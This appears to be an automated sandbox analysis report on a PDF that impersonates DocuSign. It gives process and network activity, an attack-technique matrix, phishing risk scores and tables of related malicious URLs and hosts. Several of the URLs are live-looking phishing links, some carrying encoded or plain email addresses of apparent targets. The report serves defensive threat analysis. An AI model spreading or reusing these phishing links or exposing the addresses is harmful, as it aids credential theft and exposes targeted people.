Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: xJwSq336bs.pdfInitial sample: PDF keyword /JS count = 0
Source: xJwSq336bs.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: xJwSq336bs.pdfInitial sample: PDF keyword /EmbeddedFile count = 0

Persistence and Installation Behavior

barindex
Source: PDF shotLLM: Score: 8 Reasons: The screenshot contains a visually prominent 'View Documents' button which is likely to attract user clicks. The text 'Please review and sign your document' creates a sense of urgency. The email appears to impersonate DocuSign, a well-known brand, which adds credibility to the phishing attempt. The combination of urgency and a prominent call-to-action button significantly increases the risk of phishing.
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Spearphishing Link
Windows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1467831 Sample: xJwSq336bs.pdf Startdate: 04/07/2024 Architecture: WINDOWS Score: 52 32 Antivirus detection for URL or domain 2->32 34 AI detected suspicious PDF 2->34 7 chrome.exe 1 2->7         started        10 Acrobat.exe 18 72 2->10         started        process3 dnsIp4 22 192.168.2.4, 138, 443, 49708 unknown unknown 7->22 24 239.255.255.250 unknown Reserved 7->24 12 chrome.exe 7->12         started        15 AcroCEF.exe 106 10->15         started        process5 dnsIp6 26 www.google.com 142.250.185.132, 443, 49759, 49774 GOOGLEUS United States 12->26 28 code.jquery.com 151.101.66.137, 443, 49761 FASTLYUS United States 12->28 30 3 other IPs or domains 12->30 17 AcroCEF.exe 2 15->17         started        process7 dnsIp8 20 23.47.168.24, 443, 49742 AKAMAI-ASUS United States 17->20

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html#?bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=100%SlashNextCredential Stealing type: Phishing & Social Engineering
https://cdn.jsdelivr.net/npm/bootstrap0%URL Reputationsafe
https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
https://menlologistics.com.ru/#classic-cars0%Avira URL Cloudsafe
https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js0%Avira URL Cloudsafe
https://menlologistics.com.ru/#terms0%Avira URL Cloudsafe
https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/favicon.ico0%Avira URL Cloudsafe
https://www.carlogos.org/uploads/2023/most-bought-super-cars-in-illinois-huracan.jpg0%Avira URL Cloudsafe
https://cdn.jsdelivr.net/npm/0%Avira URL Cloudsafe
https://code.jquery.com/jquery-3.5.1.slim.min.js0%Avira URL Cloudsafe
https://menlologistics.com.ru/#privacy0%Avira URL Cloudsafe
https://menlologistics.com.ru/#faq0%Avira URL Cloudsafe
https://menlologistics.com.ru/#services0%Avira URL Cloudsafe
https://menlologistics.com.ru/#about0%Avira URL Cloudsafe
https://menlologistics.com.ru/#modern-supercars0%Avira URL Cloudsafe
https://menlologistics.com.ru/#electric-vehicles0%Avira URL Cloudsafe
https://menlologistics.com.ru/#learn-more0%Avira URL Cloudsafe
https://menlologistics.com.ru/#0%Avira URL Cloudsafe
https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/,0%Avira URL Cloudsafe
https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html0%Avira URL Cloudsafe
https://menlologistics.com.ru//0%Avira URL Cloudsafe
https://www.cloudflare.com/favicon.ico0%Avira URL Cloudsafe
https://menlologistics.com.ru/#contact0%Avira URL Cloudsafe
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js0%Avira URL Cloudsafe
https://developers.cloudflare.com/r2/data-access/public-buckets/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
code.jquery.com
151.101.66.137
truefalse
    unknown
    menlologistics.com.ru
    188.114.97.3
    truefalse
      unknown
      cdnjs.cloudflare.com
      104.17.25.14
      truefalse
        unknown
        pub-ad8bdbb321694934a9a218eeb6868559.r2.dev
        104.18.2.35
        truefalse
          unknown
          www.google.com
          142.250.185.132
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://code.jquery.com/jquery-3.6.0.min.jsfalse
            • URL Reputation: safe
            unknown
            https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html#?bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E=true
            • SlashNext: Credential Stealing type: Phishing & Social Engineering
            unknown
            https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/favicon.icofalse
            • Avira URL Cloud: safe
            unknown
            https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/,false
            • Avira URL Cloud: safe
            unknown
            https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.htmlfalse
            • Avira URL Cloud: safe
            unknown
            https://menlologistics.com.ru//false
            • Avira URL Cloud: safe
            unknown
            https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://cdn.jsdelivr.net/npm/chromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://cdn.jsdelivr.net/npm/bootstrapchromecache_191.10.drfalse
            • URL Reputation: safe
            unknown
            https://code.jquery.com/jquery-3.5.1.slim.min.jschromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.jschromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://menlologistics.com.ru/#privacychromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://menlologistics.com.ru/#termschromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://menlologistics.com.ru/#serviceschromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://www.carlogos.org/uploads/2023/most-bought-super-cars-in-illinois-huracan.jpgchromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://menlologistics.com.ru/#faqchromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://menlologistics.com.ru/#classic-carschromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://menlologistics.com.ru/#aboutchromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://menlologistics.com.ru/#modern-supercarschromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://menlologistics.com.ru/#electric-vehicleschromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://menlologistics.com.ru/#learn-morechromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://menlologistics.com.ru/#chromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://menlologistics.com.ru/#contactchromecache_191.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://www.cloudflare.com/favicon.icochromecache_195.10.drfalse
            • Avira URL Cloud: safe
            unknown
            https://developers.cloudflare.com/r2/data-access/public-buckets/chromecache_195.10.drfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            104.18.2.35
            pub-ad8bdbb321694934a9a218eeb6868559.r2.devUnited States
            13335CLOUDFLARENETUSfalse
            142.250.185.132
            www.google.comUnited States
            15169GOOGLEUSfalse
            23.47.168.24
            unknownUnited States
            16625AKAMAI-ASUSfalse
            239.255.255.250
            unknownReserved
            unknownunknownfalse
            188.114.97.3
            menlologistics.com.ruEuropean Union
            13335CLOUDFLARENETUSfalse
            151.101.66.137
            code.jquery.comUnited States
            54113FASTLYUSfalse
            104.17.25.14
            cdnjs.cloudflare.comUnited States
            13335CLOUDFLARENETUSfalse
            IP
            192.168.2.4
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1467831
            Start date and time:2024-07-04 21:04:39 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 40s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowspdfcookbook.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:13
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:xJwSq336bs.pdf
            renamed because original name is a hash value
            Original Sample Name:53cf6e9968a5234c923f2826d5e9fa97c880c3fd.pdf
            Detection:MAL
            Classification:mal52.winPDF@41/56@12/8
            Cookbook Comments:
            • Found application associated with file extension: .pdf
            • Found PDF document
            • Close Viewer
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 23.211.8.250, 52.6.155.20, 3.233.129.217, 3.219.243.226, 52.22.41.97, 2.19.11.121, 2.19.11.122, 162.159.61.3, 172.64.41.3, 23.55.161.211, 23.55.161.185, 93.184.221.240, 192.229.221.95, 2.22.242.11, 2.22.242.123, 142.250.181.227, 13.74.129.92, 216.58.212.174, 66.102.1.84, 34.104.35.123, 142.250.186.42, 142.250.181.234, 172.217.16.202, 142.250.186.106, 142.250.185.202, 142.250.185.74, 172.217.18.10, 142.250.185.170, 142.250.74.202, 142.250.184.202, 142.250.185.234, 172.217.16.138, 142.250.186.138, 216.58.206.42, 142.250.184.234, 142.250.186.170, 172.217.16.131, 216.58.212.142
            • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, slscr.update.microsoft.com, clientservices.googleapis.com, acroipm2.adobe.com, wu.azureedge.net, g-msn-com-nsatc.trafficmanager.net, a1952.dscq.akamai.net, r.g.bing.com, clients2.google.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, apps.identrust.com, wu-b-net.trafficmanager.net, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, identrust.edgesuite.net, accounts.google.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com, geo2.adobe.com
            • Not all processes where analyzed, report is missing behavior information
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • VT rate limit hit for: xJwSq336bs.pdf
            TimeTypeDescription
            15:05:44API Interceptor3x Sleep call for process: AcroCEF.exe modified
            InputOutput
            URL: https://pub-ad8bdbb321694934a9a218eeb6868559.r2.dev/link.html#?bWFyaWUtY2xhdWRlLmJlZ2luQG9taHNoZXJicm9va2UucWMuY2E= Model: Perplexity: mixtral-8x7b-instruct
            {"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form, as there is no explicit request for sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text does not create a sense of urgency or interest, as there are no phrases that encourage immediate action such as 'Click here to view document' or 'Open the link to see your invoice.'","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism."]}
            Title: boldness OCR: Microsoft Sign in No account? Create one! Can't access pur account? Next Sign-in options Terms of use Privacy & ckies 
            URL: PDF Model: gpt-4o
            ```json{  "riskscore": 8,  "reasons": "The screenshot contains a visually prominent 'View Documents' button which is likely to attract user clicks. The text 'Please review and sign your document' creates a sense of urgency. The email appears to impersonate DocuSign, a well-known brand, which adds credibility to the phishing attempt. The combination of urgency and a prominent call-to-action button significantly increases the risk of phishing."}
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            23.47.168.24Invoice - 13604562148823146027218688082530555300774892366170 - Pilatus-aircraft.pdfGet hashmaliciousHTMLPhisherBrowse
              Encrypted Doc-[Ogi-5917842].pdfGet hashmaliciousHTMLPhisherBrowse
                Novolog (Pharm-Up 1966) LTD_SKM_C590368369060_417161.pdfGet hashmaliciousHTMLPhisherBrowse
                  Invoice - 21153253589581947197326090404964329500290845699807 - Toyotaconnected.pdfGet hashmaliciousUnknownBrowse
                    Hilcorp-updated agreement.pdfGet hashmaliciousUnknownBrowse
                      Invoice - 07776611412802924323813205194919526056527884439486 - Kforce.pdfGet hashmaliciousUnknownBrowse
                        invoicepast.pdf.lnk.mal.lnkGet hashmaliciousScreenConnect ToolBrowse
                          PG96120000311.pdf.lnk.mal.lnkGet hashmaliciousUnknownBrowse
                            Absa.pdfGet hashmaliciousHTMLPhisherBrowse
                              Absa.pdfGet hashmaliciousUnknownBrowse
                                104.18.2.35http://pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwlGet hashmaliciousHTMLPhisherBrowse
                                • pub-431046b43b84431ea1b4a212cd34e302.r2.dev/gsecondcheck.html?usr=ouwxfmmtalwl
                                http://pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                • pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.html
                                http://pub-5e86a1f01e5a4476812e4d108add0587.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                • pub-5e86a1f01e5a4476812e4d108add0587.r2.dev/index.html
                                http://pub-49f7bdad3ae7458f8076aa4480203a8b.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                • pub-49f7bdad3ae7458f8076aa4480203a8b.r2.dev/index.html
                                http://pub-ab9522f1c3a9451fb5bf68fa1c6bcfca.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                • pub-ab9522f1c3a9451fb5bf68fa1c6bcfca.r2.dev/index.html
                                http://pub-e23528cbdea642ddb1c88fd0d29e30b5.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                • pub-e23528cbdea642ddb1c88fd0d29e30b5.r2.dev/index.html
                                http://pub-a4db5d6837084a76bc5f6d9216e7e57d.r2.dev/a38.htmlGet hashmaliciousUnknownBrowse
                                • pub-a4db5d6837084a76bc5f6d9216e7e57d.r2.dev/a38.html
                                http://pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                • pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.html
                                http://pub-5e86a1f01e5a4476812e4d108add0587.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                • pub-5e86a1f01e5a4476812e4d108add0587.r2.dev/index.html
                                http://pub-49f7bdad3ae7458f8076aa4480203a8b.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                • pub-49f7bdad3ae7458f8076aa4480203a8b.r2.dev/index.html
                                239.255.255.250file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                  file.exeGet hashmaliciousUnknownBrowse
                                    https://chorbie.com/services/Get hashmaliciousUnknownBrowse
                                      http://79.141.36.131Get hashmaliciousUnknownBrowse
                                        https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6Get hashmaliciousHTMLPhisherBrowse
                                          hANEXOPDF.PDF40 234057.msiGet hashmaliciousUnknownBrowse
                                            Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdfGet hashmaliciousHTMLPhisherBrowse
                                              https://gateway.lighthouse.storage/ipfs/bafkreidrnkion27ep4wvaru45atnhtlbackpdwtf5j73djqjbyjdzvzmdm#mez.jiwaji@nic.bc.caGet hashmaliciousUnknownBrowse
                                                http://nassascha.synology.me/Photo.scrGet hashmaliciousUnknownBrowse
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                    188.114.97.3ScanPDF_102.exeGet hashmaliciousFormBookBrowse
                                                    • www.jjjw.xyz/ypml/
                                                    tYEY1UeurGz0Mjb.exeGet hashmaliciousFormBookBrowse
                                                    • www.txglobedev.com/dy13/?IR=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI&nL=S4247TXPfxsLR
                                                    new order.exeGet hashmaliciousFormBookBrowse
                                                    • www.coinwab.com/efdt/
                                                    http://sp.26skins.com/steamstore/category/action_run_jump/?snr=1_1530_4__12Get hashmaliciousUnknownBrowse
                                                    • sp.26skins.com/favicon.ico
                                                    BL Draft.exeGet hashmaliciousFormBookBrowse
                                                    • www.gazeta-ufaley.ru/wjr5/
                                                    Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                                    • www.pu6wac.buzz/g2ww/
                                                    Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • filetransfer.io/data-package/OWlnEE9J/download
                                                    Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                    • filetransfer.io/data-package/OWlnEE9J/download
                                                    MKCC-MEC-RFQ-115-2024.exeGet hashmaliciousFormBookBrowse
                                                    • www.checkout4xgrow.shop/ts59/?S0GhCH=DR-Lh8FH5BP&Upql=F3s9qclS9ajlyltz5vx8YuFcODa05tGO2XwI753moUwU8ctXmF/lD/LedP+MQBQFZjkX
                                                    62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • podval.top/LineToPythonJsLowupdateLongpollWindowsFlower.php
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    cdnjs.cloudflare.comhttps://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    https://vi-822.pages.dev/robots.txtGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.24.14
                                                    http://sharepoint-stonecuttercapital.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.24.14
                                                    https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.deGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.deGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.24.14
                                                    https://t.apemail.net/c/nqkr6vk3kzmvyhqvdmdrwaabbycqmbacainqogyhdmkxs5qvdmkqcvagayhveflk-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmdrwbqbaibq4aypdmdrwby3cupvkw2wlfob4fi3a4nvsqs3lmnrkyl6ojqbozlsm54gkyyvdmaacdqfaycaeaq3cvpugq2hiqgrqgc6ljdvwvsfkjjveu2skjmuixszlamviwc2dfkukgcai4nfiwczinjfsqyylnmfqryylzmvguspdfpugws3cunugrkckinqaaqcdmkxs5qvdnmuew23dnmuew23dnmuew23dnmuew23dmkqcvagayhveflkGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.24.14
                                                    https://nmg.evlink21.net/Get hashmaliciousUnknownBrowse
                                                    • 104.17.25.14
                                                    https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    Academedia_SKM_C590368369060_417161.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    code.jquery.comhttps://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6Get hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.66.137
                                                    https://vi-822.pages.dev/robots.txtGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.194.137
                                                    http://sharepoint-stonecuttercapital.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.194.137
                                                    https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.deGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.2.137
                                                    https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.deGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.130.137
                                                    https://t.apemail.net/c/nqkr6vk3kzmvyhqvdmdrwaabbycqmbacainqogyhdmkxs5qvdmkqcvagayhveflk-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmdrwbqbaibq4aypdmdrwby3cupvkw2wlfob4fi3a4nvsqs3lmnrkyl6ojqbozlsm54gkyyvdmaacdqfaycaeaq3cvpugq2hiqgrqgc6ljdvwvsfkjjveu2skjmuixszlamviwc2dfkukgcai4nfiwczinjfsqyylnmfqryylzmvguspdfpugws3cunugrkckinqaaqcdmkxs5qvdnmuew23dnmuew23dnmuew23dnmuew23dmkqcvagayhveflkGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.130.137
                                                    http://kuurza.comGet hashmaliciousUnknownBrowse
                                                    • 151.101.194.137
                                                    https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=Y2hyaXMuY291dHVAYWxnb21hLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.194.137
                                                    http://GRi-Simulations-Inc-capital-project-proposalonline-secure.yurtdaslarbinicilik.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.66.137
                                                    Academedia_SKM_C590368369060_417161.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 151.101.2.137
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUShttps://chorbie.com/services/Get hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRATBrowse
                                                    • 104.17.28.25
                                                    Invoice - 06736833774062515586349558087774116555577037575401 - Daiichi-sankyo.pdfGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.21.40.60
                                                    0001.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.74.152
                                                    Leaked.exeGet hashmaliciousXWormBrowse
                                                    • 188.114.96.3
                                                    Zz3h8cOX1E.exeGet hashmaliciousQuasarBrowse
                                                    • 104.26.13.205
                                                    Luciana Alvarez CV.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    Acal BFi UK - Products List 020240704.exeGet hashmaliciousAgentTesla, RedLine, StormKitty, XWormBrowse
                                                    • 172.67.74.152
                                                    z4XlS0wTQM.exeGet hashmaliciousQuasarBrowse
                                                    • 104.26.12.205
                                                    AKAMAI-ASUSfile.exeGet hashmaliciousVidarBrowse
                                                    • 23.192.247.89
                                                    http://sharepoint-stonecuttercapital.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 23.38.98.114
                                                    https://lantzlagetnet-my.sharepoint.com/:b:/g/personal/christian_lantzlaget_net/EfvDbyrsR1JBhKxhyaS6aX8BVyu8MWIYIqkyeRAJSRL2yA?e=6Phvc1Get hashmaliciousUnknownBrowse
                                                    • 23.214.40.215
                                                    205.185.124.50-mips-2024-07-03T23_47_54.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 2.17.90.178
                                                    https://wellbeingcaresolutions%5B.%5Dfreshdesk%5B.%5Dcom/support/solutions/articles/201000067168-wellbeing-care-solutions-ltdGet hashmaliciousHTMLPhisherBrowse
                                                    • 23.212.88.20
                                                    95DVgihS4k.elfGet hashmaliciousUnknownBrowse
                                                    • 184.26.133.196
                                                    addvXQnjp3.elfGet hashmaliciousUnknownBrowse
                                                    • 23.64.221.35
                                                    d54Y7Ql8sO.elfGet hashmaliciousUnknownBrowse
                                                    • 23.67.70.103
